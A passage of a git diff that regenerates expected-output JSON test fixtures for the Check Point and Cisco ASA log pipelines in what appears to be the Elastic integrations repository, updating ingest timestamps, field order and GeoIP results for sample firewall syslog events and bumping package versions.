proto:\"6\"; s_port:\"51894\"; service:\"80\"; service_id:\"http\"; src:\"192.168.1.100\"; xlatedport:\"0\"; xlatedst:\"0.0.0.0\"; xlatesport:\"11157\"; xlatesrc:\"0.0.0.0\"]", "kind": "event", "action": "Accept", @@ -690,7 +666,7 @@ }, "event": { "sequence": 3, - "ingested": "2021-12-09T13:31:19.083362200Z", + "ingested": "2021-12-14T14:36:07.875464913Z", "original": "\u003c134\u003e1 2020-03-30T01:18:46Z gw-da58d3 CheckPoint 8363 - [action:\"Accept\"; flags:\"444676\"; ifdir:\"outbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e8148f6,0x2,0x353707c7,0xee78a1dc}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"3\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\\]\"; dst:\"192.168.1.1\"; inzone:\"Local\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; outzone:\"External\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"17\"; s_port:\"47919\"; service:\"53\"; service_id:\"domain-udp\"; src:\"192.168.1.100\"]", "kind": "event", "action": "Accept", @@ -723,7 +699,7 @@ }, "event": { "sequence": 5, - "ingested": "2021-12-09T13:31:19.083366500Z", + "ingested": "2021-12-14T14:36:07.875465515Z", "original": "\u003c134\u003e1 2020-03-30T01:18:46Z gw-da58d3 CheckPoint 8363 - [flags:\"133440\"; ifdir:\"inbound\"; loguid:\"{0x5e8148f7,0x0,0x6401a8c0,0x108620ab}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"5\"; version:\"5\"; comment:\"No update was found\"; description:\"Contracts\"; product:\"Security Gateway/Management\"; status:\"Finished\"; update_service:\"1\"; version:\"1.0\"]", "id": "{0x5e8148f7,0x0,0x6401a8c0,0x108620ab}", "category": [ @@ -792,7 +768,7 @@ }, "event": { "sequence": 13, - "ingested": "2021-12-09T13:31:19.083393500Z", + "ingested": "2021-12-14T14:36:07.875465913Z", "original": "\u003c134\u003e1 2020-03-30T06:12:45Z gw-da58d3 CheckPoint 8363 - [action:\"Accept\"; flags:\"444676\"; ifdir:\"outbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e818ddd,0xc,0x353707c7,0xee78a1dc}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"13\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\\]\"; dst:\"192.168.1.153\"; inzone:\"Local\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; outzone:\"External\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"17\"; s_port:\"43103\"; service:\"514\"; service_id:\"syslog\"; src:\"192.168.1.100\"]", "kind": "event", "action": "Accept", @@ -826,7 +802,7 @@ "event": { "severity": 1, "sequence": 1, - "ingested": "2021-12-09T13:31:19.083397600Z", + "ingested": "2021-12-14T14:36:07.875466302Z", "original": "\u003c134\u003e1 2020-03-30T06:12:51Z gw-da58d3 CheckPoint 8363 - [flags:\"166216\"; ifdir:\"outbound\"; loguid:\"{0x5e818de4,0x0,0x6401a8c0,0x108620ab}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"1\"; version:\"5\"; db_ver:\"20033003\"; description:\"Gateway was updated with database version: 22032001.\"; product:\"Application Control\"; severity:\"1\"; update_status:\"updated\"]", "kind": "event", "id": "{0x5e818de4,0x0,0x6401a8c0,0x108620ab}", @@ -860,7 +836,7 @@ "event": { "severity": 1, "sequence": 2, - "ingested": "2021-12-09T13:31:19.083401900Z", + "ingested": "2021-12-14T14:36:07.875466688Z", "original": "\u003c134\u003e1 2020-03-30T06:12:51Z gw-da58d3 CheckPoint 8363 - [flags:\"166216\"; ifdir:\"outbound\"; loguid:\"{0x5e818de4,0x1,0x6401a8c0,0x108620ab}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"2\"; version:\"5\"; db_ver:\"20033003\"; description:\"Gateway was updated with database version: 22032001.\"; product:\"URL Filtering\"; severity:\"1\"; update_status:\"updated\"]", "kind": "event", "id": "{0x5e818de4,0x1,0x6401a8c0,0x108620ab}", @@ -929,7 +905,7 @@ }, "event": { "sequence": 1, - "ingested": "2021-12-09T13:31:19.083405700Z", + "ingested": "2021-12-14T14:36:07.875467078Z", "original": "\u003c134\u003e1 2020-03-30T06:13:21Z gw-da58d3 CheckPoint 8363 - [action:\"Accept\"; flags:\"411908\"; ifdir:\"inbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e818e01,0x0,0x353707c7,0xee78a1dc}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"1\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\\]\"; dst:\"192.168.1.255\"; inzone:\"External\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; outzone:\"Local\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"17\"; s_port:\"138\"; service:\"138\"; service_id:\"nbdatagram\"; src:\"192.168.1.1\"]", "kind": "event", "action": "Accept", @@ -950,39 +926,6 @@ "tcp_flags": "FIN-ACK", "logid": "1" }, - "destination": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "Oxfordshire", - "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" - } - }, - "port": 80, - "ip": "81.2.69.144" - }, - "source": { - "port": 65488, - "ip": "192.168.1.100" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "iana_number": "6", - "direction": "outbound" - }, "observer": { "name": "192.168.1.100", "product": "VPN-1 \u0026 FireWall-1", @@ -1004,9 +947,29 @@ "81.2.69.144" ] }, + "destination": { + "geo": { + "continent_name": "Europe", + "region_iso_code": "GB-ENG", + "city_name": "London", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "England", + "location": { + "lon": -0.0931, + "lat": 51.5142 + } + }, + "port": 80, + "ip": "81.2.69.144" + }, + "source": { + "port": 65488, + "ip": "192.168.1.100" + }, "event": { "sequence": 1, - "ingested": "2021-12-09T13:31:19.083411200Z", + "ingested": "2021-12-14T14:36:07.875467603Z", "original": "\u003c134\u003e1 2020-03-30T06:13:42Z gw-da58d3 CheckPoint 8363 - [action:\"Drop\"; flags:\"425984\"; ifdir:\"outbound\"; ifname:\"eth0\"; logid:\"1\"; loguid:\"{0x5e818e17,0x0,0x6401a8c0,0x108620ab}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"1\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\\]\"; dst:\"81.2.69.144\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"6\"; s_port:\"65488\"; service:\"80\"; src:\"192.168.1.100\"; tcp_flags:\"FIN-ACK\"; tcp_packet_out_of_state:\"First packet isn't SYN\"]", "kind": "event", "action": "Drop", @@ -1014,6 +977,13 @@ "category": [ "network" ] + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "iana_number": "6", + "direction": "outbound" } }, { @@ -1070,7 +1040,7 @@ }, "event": { "sequence": 1, - "ingested": "2021-12-09T13:31:19.083415400Z", + "ingested": "2021-12-14T14:36:07.875468033Z", "original": "\u003c134\u003e1 2020-03-30T07:18:59Z gw-da58d3 CheckPoint 8363 - [action:\"Accept\"; flags:\"444676\"; ifdir:\"outbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e819d63,0x0,0x353707c7,0xee78a1dc}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"1\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\\]\"; dst:\"192.168.1.153\"; inzone:\"Local\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; outzone:\"External\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"17\"; s_port:\"43103\"; service:\"514\"; service_id:\"syslog\"; src:\"192.168.1.100\"]", "kind": "event", "action": "Accept", @@ -1139,7 +1109,7 @@ }, "event": { "sequence": 1, - "ingested": "2021-12-09T13:31:19.083419800Z", + "ingested": "2021-12-14T14:36:07.875468418Z", "original": "\u003c134\u003e1 2020-03-30T07:19:22Z gw-da58d3 CheckPoint 8363 - [action:\"Accept\"; flags:\"411908\"; ifdir:\"inbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e819d7a,0x0,0x353707c7,0xee78a1dc}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"1\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\\]\"; dst:\"192.168.1.255\"; inzone:\"External\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; outzone:\"Local\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"17\"; s_port:\"50024\"; service:\"137\"; service_id:\"nbname\"; src:\"192.168.1.196\"]", "kind": "event", "action": "Accept", @@ -1208,7 +1178,7 @@ }, "event": { "sequence": 1, - "ingested": "2021-12-09T13:31:19.083423700Z", + "ingested": "2021-12-14T14:36:07.875468808Z", "original": "\u003c134\u003e1 2020-03-30T07:20:33Z gw-da58d3 CheckPoint 8363 - [action:\"Accept\"; flags:\"411908\"; ifdir:\"inbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e819dc1,0x0,0x353707c7,0xee78a1dc}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"1\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\\]\"; dst:\"192.168.1.100\"; inzone:\"External\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; outzone:\"Local\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"6\"; s_port:\"60226\"; service:\"22\"; service_id:\"ssh\"; src:\"192.168.1.205\"]", "kind": "event", "action": "Accept", @@ -1277,7 +1247,7 @@ }, "event": { "sequence": 1, - "ingested": "2021-12-09T13:31:19.083428Z", + "ingested": "2021-12-14T14:36:07.875469195Z", "original": "\u003c134\u003e1 2020-03-30T07:20:35Z gw-da58d3 CheckPoint 8363 - [action:\"Accept\"; flags:\"444676\"; ifdir:\"outbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e819dc3,0x0,0x353707c7,0xee78a1dc}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"1\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\\]\"; dst:\"192.168.1.153\"; inzone:\"Local\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; outzone:\"External\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"17\"; s_port:\"43103\"; service:\"514\"; service_id:\"syslog\"; src:\"192.168.1.100\"]", "kind": "event", "action": "Accept", diff --git a/packages/checkpoint/manifest.yml b/packages/checkpoint/manifest.yml index 3f2c7396e67..0fcc2a12b16 100644 --- a/packages/checkpoint/manifest.yml +++ b/packages/checkpoint/manifest.yml @@ -1,6 +1,6 @@ name: checkpoint title: Check Point -version: 1.2.1 +version: 1.2.2 release: ga description: Collect logs from Check Point with Elastic Agent. type: integration diff --git a/packages/cisco/changelog.yml b/packages/cisco/changelog.yml index b7d42588364..7209b89c291 100644 --- a/packages/cisco/changelog.yml +++ b/packages/cisco/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.12.5" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "0.12.4" changes: - description: Change test public IPs to the supported subset diff --git a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-additional-messages.log-expected.json b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-additional-messages.log-expected.json index e7edee78768..f3701aab74a 100644 --- a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-additional-messages.log-expected.json +++ b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-additional-messages.log-expected.json @@ -63,7 +63,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.162829200Z", + "ingested": "2021-12-14T14:36:13.057627392Z", "original": "May 5 17:51:17 dev01: %FTD-6-302013: Built inbound TCP connection 111111111 for net:10.10.10.10/53500 (81.2.69.144/53500) to fw111:192.168.2.2/53500 (81.2.69.144/53500)", "code": "302013", "kind": "event", @@ -150,7 +150,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.162839Z", + "ingested": "2021-12-14T14:36:13.057630410Z", "original": "May 5 17:51:17 dev01: %FTD-6-302015: Built inbound UDP connection 111111111 for net:10.10.10.10/53500 (81.2.69.144/53500) to fw111:192.168.2.2/53500 (81.2.69.144/53500)", "code": "302015", "kind": "event", @@ -221,7 +221,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.162845100Z", + "ingested": "2021-12-14T14:36:13.057630905Z", "original": "May 5 17:51:17 dev01: %FTD-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 81.2.69.144/0 laddr 192.168.2.2/0 type 3 code 3", "code": "302020", "kind": "event", @@ -243,16 +243,6 @@ } }, { - "log": { - "level": "debug" - }, - "source": { - "address": "192.168.2.2", - "ip": "192.168.2.2" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "ingress": { "interface": { @@ -276,13 +266,20 @@ "192.168.2.2" ] }, + "log": { + "level": "debug" + }, "host": { "hostname": "dev01" }, + "source": { + "address": "192.168.2.2", + "ip": "192.168.2.2" + }, "event": { "severity": 7, "duration": 0, - "ingested": "2021-12-09T13:31:25.162851100Z", + "ingested": "2021-12-14T14:36:13.057631270Z", "original": "May 5 17:51:17 dev01: %FTD-7-609002: Teardown local-host net:192.168.2.2 duration 0:00:00", "code": "609002", "kind": "event", @@ -301,19 +298,12 @@ "asa": { "source_interface": "net" } - } - }, - { - "log": { - "level": "debug" - }, - "source": { - "address": "192.168.2.2", - "ip": "192.168.2.2" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "ingress": { "interface": { @@ -337,12 +327,19 @@ "192.168.2.2" ] }, + "log": { + "level": "debug" + }, "host": { "hostname": "dev01" }, + "source": { + "address": "192.168.2.2", + "ip": "192.168.2.2" + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:31:25.162855800Z", + "ingested": "2021-12-14T14:36:13.057631640Z", "original": "May 5 17:51:17 dev01: %FTD-7-609001: Built local-host net:192.168.2.2", "code": "609001", "kind": "event", @@ -359,7 +356,10 @@ "asa": { "source_interface": "net" } - } + }, + "tags": [ + "preserve_original_event" + ] }, { "log": { @@ -408,7 +408,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.162861200Z", + "ingested": "2021-12-14T14:36:13.057632027Z", "original": "May 5 17:51:17 dev01: %FTD-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 81.2.69.144/0 laddr 192.168.2.2/0 type 3 code 1", "code": "302020", "kind": "event", @@ -490,7 +490,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.162867800Z", + "ingested": "2021-12-14T14:36:13.057632384Z", "original": "May 5 17:51:17 dev01: %FTD-6-805001: Offloaded TCP Flow for connection 111111111 from fw111:10.10.10.10/111 (81.2.69.144/111) to fw111:192.168.2.2/111 (81.2.69.144/111)", "code": "805001", "kind": "event", @@ -569,7 +569,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.162873700Z", + "ingested": "2021-12-14T14:36:13.057632745Z", "original": "May 5 17:51:17 dev01: %FTD-6-805002: TCP Flow is no longer offloaded for connection 941243214 from net:10.192.18.4/51261 (10.192.18.4/51261) to fw109:10.192.70.66/443 (10.192.70.66/443)", "code": "805002", "kind": "event", @@ -643,7 +643,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-09T13:31:25.162880900Z", + "ingested": "2021-12-14T14:36:13.057633632Z", "original": "May 5 17:51:17 dev01: %FTD-7-710005: UDP request discarded from 192.168.2.2/68 to fw111:10.10.10.10/67", "code": "710005", "kind": "event", @@ -725,7 +725,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.162886600Z", + "ingested": "2021-12-14T14:36:13.057634031Z", "original": "May 5 17:51:17 dev01: %FTD-6-303002: FTP connection from net:192.168.2.2/63656 to fw111:10.192.18.4/21, user testuser Stored file /export/home/sysm/ftproot/sdsdsds/tmp.log", "code": "303002", "kind": "event", @@ -768,7 +768,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-09T13:31:25.162890900Z", + "ingested": "2021-12-14T14:36:13.057634409Z", "original": "May 5 17:51:17 dev01: %FTD-7-710006: VRRP request discarded from 192.168.2.2 to fw111:192.18.4", "code": "710006", "kind": "event", @@ -788,16 +788,6 @@ ] }, { - "log": { - "level": "warning" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "iana_number": "1", - "transport": "icmp" - }, "observer": { "ingress": { "interface": { @@ -818,12 +808,15 @@ "dev01" ] }, + "log": { + "level": "warning" + }, "host": { "hostname": "dev01" }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:25.162896700Z", + "ingested": "2021-12-14T14:36:13.057634959Z", "original": "May 5 17:51:17 dev01: %FTD-4-313005: No matching connection for ICMP error message: icmp src fw111:10.192.33.100 dst fw111:192.18.4 (type 3, code 3) on fw111 interface. Original IP payload: udp src 192.18.4/53 dst 81.2.69.144/10872.", "code": "313005", "kind": "event", @@ -839,6 +832,13 @@ "asa": { "source_interface": "fw111" } + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "iana_number": "1", + "transport": "icmp" } }, { @@ -888,7 +888,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.162903400Z", + "ingested": "2021-12-14T14:36:13.057635336Z", "original": "May 5 18:16:21 dev01: %ASA-6-302021: Teardown ICMP connection for faddr 192.168.2.2/0 gaddr 81.2.69.144/2 laddr 10.10.10.10/2 type 8 code 0", "code": "302021", "kind": "event", @@ -910,16 +910,6 @@ } }, { - "log": { - "level": "debug" - }, - "source": { - "address": "10.10.10.10", - "ip": "10.10.10.10" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "ingress": { "interface": { @@ -943,12 +933,19 @@ "10.10.10.10" ] }, + "log": { + "level": "debug" + }, "host": { "hostname": "dev01" }, + "source": { + "address": "10.10.10.10", + "ip": "10.10.10.10" + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:31:25.162910Z", + "ingested": "2021-12-14T14:36:13.057635687Z", "original": "May 5 18:22:35 dev01: %ASA-7-609001: Built local-host net:10.10.10.10", "code": "609001", "kind": "event", @@ -965,19 +962,12 @@ "asa": { "source_interface": "net" } - } - }, - { - "log": { - "level": "debug" - }, - "source": { - "address": "10.10.10.10", - "ip": "10.10.10.10" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "ingress": { "interface": { @@ -1001,13 +991,20 @@ "10.10.10.10" ] }, + "log": { + "level": "debug" + }, "host": { "hostname": "dev01" }, + "source": { + "address": "10.10.10.10", + "ip": "10.10.10.10" + }, "event": { "severity": 7, "duration": 0, - "ingested": "2021-12-09T13:31:25.162916500Z", + "ingested": "2021-12-14T14:36:13.057636049Z", "original": "May 5 18:24:31 dev01: %ASA-7-609002: Teardown local-host identity:10.10.10.10 duration 0:00:00", "code": "609002", "kind": "event", @@ -1026,7 +1023,10 @@ "asa": { "source_interface": "identity" } - } + }, + "tags": [ + "preserve_original_event" + ] }, { "log": { @@ -1075,7 +1075,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.162923100Z", + "ingested": "2021-12-14T14:36:13.057636410Z", "original": "May 5 18:29:32 dev01: %ASA-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 81.2.69.144/0 laddr 10.192.46.90/0", "code": "302020", "kind": "event", @@ -1141,7 +1141,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.162929900Z", + "ingested": "2021-12-14T14:36:13.057636881Z", "original": "May 5 18:29:32 dev01: %ASA-6-302020: Built outbound ICMP connection for faddr 10.10.10.10/0 gaddr 81.2.69.144/0 laddr 192.168.2.2/0 type 3 code 3", "code": "302020", "kind": "event", @@ -1220,7 +1220,7 @@ "severity": 6, "duration": 0, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:31:25.162936400Z", + "ingested": "2021-12-14T14:36:13.057637245Z", "original": "May 5 18:29:32 dev01: %ASA-6-302014: Teardown TCP connection 2960892904 for out111:10.10.10.10/443 to fw111:192.168.2.2/55225 duration 0:00:00 bytes 0 TCP Reset-I", "code": "302014", "kind": "event", @@ -1306,7 +1306,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.162942900Z", + "ingested": "2021-12-14T14:36:13.057637610Z", "original": "May 5 18:29:32 dev01: %ASA-6-302013: Built outbound TCP connection 1588662 for intfacename:192.168.2.2/80 (81.2.69.144/80) to net:10.10.10.10/54839 (81.2.69.144/54839)", "code": "302013", "kind": "event", @@ -1386,7 +1386,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:31:25.162949400Z", + "ingested": "2021-12-14T14:36:13.057637986Z", "original": "May 5 18:29:32 dev01: %ASA-6-302012: Teardown dynamic UDP translation from fw111:10.10.10.10/54230 to out111:192.168.2.2/54230 duration 0:00:00", "code": "302012", "kind": "event", @@ -1456,7 +1456,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:25.162956Z", + "ingested": "2021-12-14T14:36:13.057638359Z", "original": "May 5 18:40:50 dev01: %ASA-4-313004: Denied ICMP type=0, from laddr 10.10.10.10 on interface fw502 to 192.168.2.2: no matching session", "code": "313004", "kind": "event", @@ -1532,7 +1532,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.162962600Z", + "ingested": "2021-12-14T14:36:13.057638717Z", "original": "May 5 18:40:50 dev01: %ASA-6-305011: Built dynamic TCP translation from fw111:10.10.10.10/57006 to out111:192.168.2.2/57006", "code": "305011", "kind": "event", @@ -1602,7 +1602,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:31:25.162969500Z", + "ingested": "2021-12-14T14:36:13.057639099Z", "original": "May 5 18:40:50 dev01: %ASA-2-106001: Inbound TCP connection denied from 192.168.2.2/43803 to 10.10.10.10/14322 flags SYN on interface out111", "code": "106001", "kind": "event", @@ -1679,7 +1679,7 @@ "event": { "severity": 2, "duration": 124000000000, - "ingested": "2021-12-09T13:31:25.162976200Z", + "ingested": "2021-12-14T14:36:13.057639576Z", "original": "May 5 18:40:50 dev01: %ASA-2-302016: Teardown UDP connection 1671727 for intfacename:10.10.10.10/161 to net:1192.168.2.2/53356 duration 0:02:04 bytes 64585", "code": "302016", "kind": "event", @@ -1765,7 +1765,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:31:25.162982800Z", + "ingested": "2021-12-14T14:36:13.057639938Z", "original": "May 5 18:40:50 dev01: %ASA-2-302015: Built outbound UDP connection 1743372 for intfacename:10.10.10.10/161 (81.2.69.144/161) to net:192.168.2.2/22638 (81.2.69.144/22638)", "code": "302015", "kind": "event", @@ -1852,7 +1852,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:31:25.162992400Z", + "ingested": "2021-12-14T14:36:13.057640297Z", "original": "May 5 18:40:50 dev01: %ASA-2-302015: Built outbound UDP connection 1743372 for intfacename:10.10.10.10/161 (81.2.69.144/161) to net:192.168.2.2/22638 (81.2.69.144/22638)", "code": "302015", "kind": "event", @@ -1931,7 +1931,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:25.162997900Z", + "ingested": "2021-12-14T14:36:13.057640742Z", "original": "May 5 18:40:50 dev01: %ASA-4-106023: Deny tcp src fw111:10.10.10.10/64388 dst out111:192.168.2.2/443 by access-group \"out1111_access_out\" [0x47e21ef4, 0x47e21ef4]", "code": "106023", "kind": "event", @@ -2001,7 +2001,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:25.163003300Z", + "ingested": "2021-12-14T14:36:13.057641120Z", "original": "May 5 18:40:50 dev01: %ASA-4-106021: Deny TCP reverse path check from 192.168.2.2 to 10.10.10.10 on interface fw111", "code": "106021", "kind": "event", @@ -2072,7 +2072,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:31:25.163009800Z", + "ingested": "2021-12-14T14:36:13.057641481Z", "original": "May 5 19:02:58 dev01: %ASA-2-106006: Deny inbound UDP from 192.168.2.2/65020 to 10.10.10.10/65020 on interface fw111", "code": "106006", "kind": "event", @@ -2142,7 +2142,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.163016400Z", + "ingested": "2021-12-14T14:36:13.057641836Z", "original": "May 5 19:02:58 dev01: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.2/53089 to 10.10.10.10/443 flags FIN PSH ACK on interface out111", "code": "106015", "kind": "event", @@ -2212,7 +2212,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.163020900Z", + "ingested": "2021-12-14T14:36:13.057642198Z", "original": "May 5 19:02:58 dev01: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.2/17127 to 10.10.10.10/443 flags PSH ACK on interface out111", "code": "106015", "kind": "event", @@ -2282,7 +2282,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.163026300Z", + "ingested": "2021-12-14T14:36:13.057642558Z", "original": "May 5 19:02:58 dev01: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.2/24223 to 10.10.10.10/443 flags RST on interface fw111", "code": "106015", "kind": "event", @@ -2357,7 +2357,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.163033Z", + "ingested": "2021-12-14T14:36:13.057642918Z", "original": "May 5 19:02:58 dev01: %ASA-6-302022: Built director stub TCP connection for fw1111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (81.2.69.144/10051)", "code": "302022", "kind": "event", @@ -2431,7 +2431,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.163038700Z", + "ingested": "2021-12-14T14:36:13.057643280Z", "original": "May 5 19:02:58 dev01: %ASA-6-302022: Built forwarder stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (81.2.69.144/10051)", "code": "302022", "kind": "event", @@ -2505,7 +2505,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.163043700Z", + "ingested": "2021-12-14T14:36:13.057643750Z", "original": "May 5 19:02:58 dev01: %ASA-6-302022: Built backup stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.1682.2.2/10051 (81.2.69.144/10051)", "code": 